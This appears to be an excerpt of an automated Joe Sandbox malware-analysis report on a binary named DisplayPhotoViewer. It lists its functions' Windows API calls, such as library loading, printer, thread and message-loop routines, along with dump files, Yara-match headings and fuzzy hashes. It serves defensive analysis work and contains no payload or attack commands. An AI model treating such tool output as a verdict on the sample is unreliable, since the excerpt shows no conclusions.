                                                                                                      • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
                                                                                                      • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
                                                                                                      • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
                                                                                                      • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
                                                                                                      • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
                                                                                                      • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
                                                                                                    • LoadLibraryA.KERNEL32(gdi32.dll,?,75BFCF90,?,11003C82,00000000,00000008), ref: 1113B7D5
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 1113B7E7
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11003C82,00000000,00000008), ref: 1113B7FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                                                    • String ID: SetLayout$gdi32.dll
                                                                                                    • API String ID: 796689547-836973393
                                                                                                    • Opcode ID: dd7f61846106ed16b6de00baadf4d64720b3b430165eb6431653a99895e619f8
                                                                                                    • Instruction ID: fcbc23df4802d43fd542e0cc31971a5367ee65483ed6e28c66af2e23f0707a34
                                                                                                    • Opcode Fuzzy Hash: dd7f61846106ed16b6de00baadf4d64720b3b430165eb6431653a99895e619f8
                                                                                                    • Instruction Fuzzy Hash: A9E0ED3A3001256B93025A2BEC849AEBB5CEEC42B63048031FD28C2248EA30C80586B5
                                                                                                    Function 11043800 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$__wcsicoll_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3719176846-0
                                                                                                    • Opcode ID: 1e066dc6a2c2fd3b8490b78c425d1fc150c0e70213a420b84c7e76dcbd66d9c4
                                                                                                    • Instruction ID: 233b9c775c86b55ee17c32b0d06f93d69e5b4b07b1d21ebef60919d9052ea710
                                                                                                    • Opcode Fuzzy Hash: 1e066dc6a2c2fd3b8490b78c425d1fc150c0e70213a420b84c7e76dcbd66d9c4
                                                                                                    • Instruction Fuzzy Hash: F9A1DA75E046299FCB61CF59CC84ADAB7B9AF89304F2045D9E50DAB310DB31AE85CF50
                                                                                                    Function 10706D56 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 251COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsBadWritePtr.KERNEL32(?), ref: 10706D74
                                                                                                    • IsBadWritePtr.KERNEL32(?,000041C4), ref: 10706DAD
                                                                                                    • IsBadWritePtr.KERNEL32(?,00008000), ref: 10706E0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Write
                                                                                                    • String ID: $@
                                                                                                    • API String ID: 3165279579-1077428164
                                                                                                    • Opcode ID: f43a3dcf2f54acfc640fd8b9967bf3e9520b20585d24541290fc8f86682844a1
                                                                                                    • Instruction ID: 00a7849858fe3d9b1527e8407fc5a1c654934172b944ca3fa64e6404c23ee695
                                                                                                    • Opcode Fuzzy Hash: f43a3dcf2f54acfc640fd8b9967bf3e9520b20585d24541290fc8f86682844a1
                                                                                                    • Instruction Fuzzy Hash: D5A16C70E0421ADBDB54CB58D890AADF3F1FF4A364F71836AE522A62D9D3709E41CB50
                                                                                                    Function 1115B0F7 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 4048096073-0
                                                                                                    • Opcode ID: 1c5e414202f660881287e92f0d7b6c526bb708caf1c3210ab8dd591ed19701e4
                                                                                                    • Instruction ID: ee3ac379b69140bbf159f532ce0e90d4beceeac01acc18122968c740f6794ac6
                                                                                                    • Opcode Fuzzy Hash: 1c5e414202f660881287e92f0d7b6c526bb708caf1c3210ab8dd591ed19701e4
                                                                                                    • Instruction Fuzzy Hash: 8C51E630E00609EFDBC08FB5998469EFBB3FF423A4F108269E43596190E770AA50CF59
                                                                                                    Function 10709422 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 10709480
                                                                                                    • GetFileType.KERNEL32(00000480), ref: 1070952B
                                                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 1070958E
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 1070959C
                                                                                                    • SetHandleCount.KERNEL32 ref: 107095D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 1710529072-0
                                                                                                    • Opcode ID: 540f23a83dea661e50f95216cafbd5bb8c5bdc0f9f6af70afa66a5e260f65166
                                                                                                    • Instruction ID: fe3ba0319f7d85e962cc7c2cfbb6df120c3e9967a33f4c46026a810db297d098
                                                                                                    • Opcode Fuzzy Hash: 540f23a83dea661e50f95216cafbd5bb8c5bdc0f9f6af70afa66a5e260f65166
                                                                                                    • Instruction Fuzzy Hash: FF512371A04255DFC712CB38CC8865A7BE0EB1B364F26876CE5A6CB2E5D730D856C750
                                                                                                    Function 11061830 Relevance: 7.6, APIs: 5, Instructions: 125sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EndPagePrinter.WINSPOOL.DRV(00000000), ref: 11061902
                                                                                                    • EndDocPrinter.WINSPOOL.DRV(00000000), ref: 11061908
                                                                                                    • ClosePrinter.WINSPOOL.DRV(00000000,00000000), ref: 1106190E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11061916
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1106194A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Printer.$Close$HandlePageSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2391129857-0
                                                                                                    • Opcode ID: 3a3e017380ba76cd7ee2123f4a9f8e012680ae733483537db7516579aff359a9
                                                                                                    • Instruction ID: 7531ab9e0973a1f7646a0806b5cca008d58d5e2e9b6a2bee3bfbf99ed1efb34d
                                                                                                    • Opcode Fuzzy Hash: 3a3e017380ba76cd7ee2123f4a9f8e012680ae733483537db7516579aff359a9
                                                                                                    • Instruction Fuzzy Hash: 1B416E35E00205EFEB41CF64CC80B9EBBF9AF89315F1485A9DD599B285D770A980CFA0
                                                                                                    Function 1103B130 Relevance: 7.6, APIs: 5, Instructions: 109threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,110B2100,00000001,00000000,?), ref: 1103B1D2
                                                                                                      • Part of subcall function 110AEE90: InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF15
                                                                                                      • Part of subcall function 110AEE90: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF1F
                                                                                                      • Part of subcall function 110AEE90: GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF3A
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1103B23E
                                                                                                    • CreateThread.KERNEL32(00000000,00002000,1111E680,?,00000000,218EC38C), ref: 1103B25A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1103B261
                                                                                                    • SetEvent.KERNEL32(?), ref: 1103B2A1
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateEvent$CloseHandle$CriticalInitializeSectionThreadVersion_malloc_memsetwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1003535115-0
                                                                                                    • Opcode ID: 48dcf68bbfe972259273c84229e7585fa66485648a2311e598ce3c405fa79fee
                                                                                                    • Instruction ID: 59b7b7a8b8739afbf16cdefbc8fc6f7aac5884a9360f93b9abd0fb9c2e8306ac
                                                                                                    • Opcode Fuzzy Hash: 48dcf68bbfe972259273c84229e7585fa66485648a2311e598ce3c405fa79fee
                                                                                                    • Instruction Fuzzy Hash: A8418D70A10B05AFEB21DFA0CC88BAEB7E4FB84319F00462DE92697284DB757444CB50
                                                                                                    Function 1108D000 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1108D01A
                                                                                                      • Part of subcall function 110C7250: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
                                                                                                      • Part of subcall function 110C7250: LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
                                                                                                    • TranslateAcceleratorA.USER32(?,?,?,?,?,?,1108EA30,?,00000000,?,00000000), ref: 1108D047
                                                                                                    • TranslateMessage.USER32(?), ref: 1108D051
                                                                                                    • DispatchMessageA.USER32(?), ref: 1108D05B
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1108D06B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 754905447-0
                                                                                                    • Opcode ID: 9715f5ed4c2b1510851d0b39af16146f46c1d8d150cabc500fc657d2b3488801
                                                                                                    • Instruction ID: 3fa10b9cd5e0152477ff404b9afb0882a77b0557918c3a19b2c786b3f540e03f
                                                                                                    • Opcode Fuzzy Hash: 9715f5ed4c2b1510851d0b39af16146f46c1d8d150cabc500fc657d2b3488801
                                                                                                    • Instruction Fuzzy Hash: DD017572E0031B67D720DAB59C81FAFB3BC9B84748F408568FA10D6185E765F4078B61
                                                                                                    Function 107086F5 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000100,00000000,1070BBCA,1070BD62,00000100,00000000,1070C67D,00000000,00000000), ref: 107086F7
                                                                                                    • TlsGetValue.KERNEL32 ref: 10708705
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 10708751
                                                                                                      • Part of subcall function 1070B81C: HeapAlloc.KERNEL32(00000008,1070871A,00000000,00000000,00000000,10710C28,000000FF,?,1070871A,00000001,00000074), ref: 1070B912
                                                                                                    • TlsSetValue.KERNEL32(00000000), ref: 10708729
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1070873A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2020098873-0
                                                                                                    • Opcode ID: f031bc719a5da730e93987fed5af29b35020afa2972dc8a45414b80f4ee78bab
                                                                                                    • Instruction ID: 591b1fbaed1325d30b304ccb4e142b7f90dc3051da1f312c7ab2d11032e75b83
                                                                                                    • Opcode Fuzzy Hash: f031bc719a5da730e93987fed5af29b35020afa2972dc8a45414b80f4ee78bab
                                                                                                    • Instruction Fuzzy Hash: B8F0F6356816319BC3621B70ACCD7493BD4EF0E7B1B268724F585D61E8CFB0880097D8
                                                                                                    Function 107078FB Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,?,?,107086C9,10705CC4,10705D1D,?,?,?), ref: 1070792F
                                                                                                      • Part of subcall function 10708490: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000040,10702706,?,10712290,?,0000005C), ref: 10708564
                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,107086C9,10705CC4,10705D1D,?,?,?), ref: 1070794A
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 10707952
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 1070795A
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 10707962
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSection$FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 447823528-0
                                                                                                    • Opcode ID: eaf239efc731e46a156c24aaa06acd0f5c0fed71225901f548c2ef4761281912
                                                                                                    • Instruction ID: 70a24dfaf9f851c3e1ab83a93fb83a48309f5fa0f7f317504c9ae551007d002b
                                                                                                    • Opcode Fuzzy Hash: eaf239efc731e46a156c24aaa06acd0f5c0fed71225901f548c2ef4761281912
                                                                                                    • Instruction Fuzzy Hash: 1CF0E932D103E069CB603F5AAC98B49BAE4EA81360313827AE491570B48D307C80C9C0
                                                                                                    Function 1110F3B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1110F41E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$DeleteObject
                                                                                                    • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                                    • API String ID: 3011517232-3209293507
                                                                                                    • Opcode ID: 2007a20dd36d17b756c5d28e38a9b50283d0281504c78063b5ad7e6fd666dfc9
                                                                                                    • Instruction ID: 4b4fa7f79596387b8477c8d8e3ee3d3e33fb9f23529e92e7f8220badaaf45fe9
                                                                                                    • Opcode Fuzzy Hash: 2007a20dd36d17b756c5d28e38a9b50283d0281504c78063b5ad7e6fd666dfc9
                                                                                                    • Instruction Fuzzy Hash: 91417E71E00B468FD714CE79DD856AFF6E1FB84219F15892ED9AAD2240DB3465418F01
                                                                                                    Function 11083620 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11083B10: _memset.LIBCMT ref: 11083B2F
                                                                                                      • Part of subcall function 11083B10: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
                                                                                                    • _memset.LIBCMT ref: 1108372A
                                                                                                    • _free.LIBCMT ref: 11083744
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
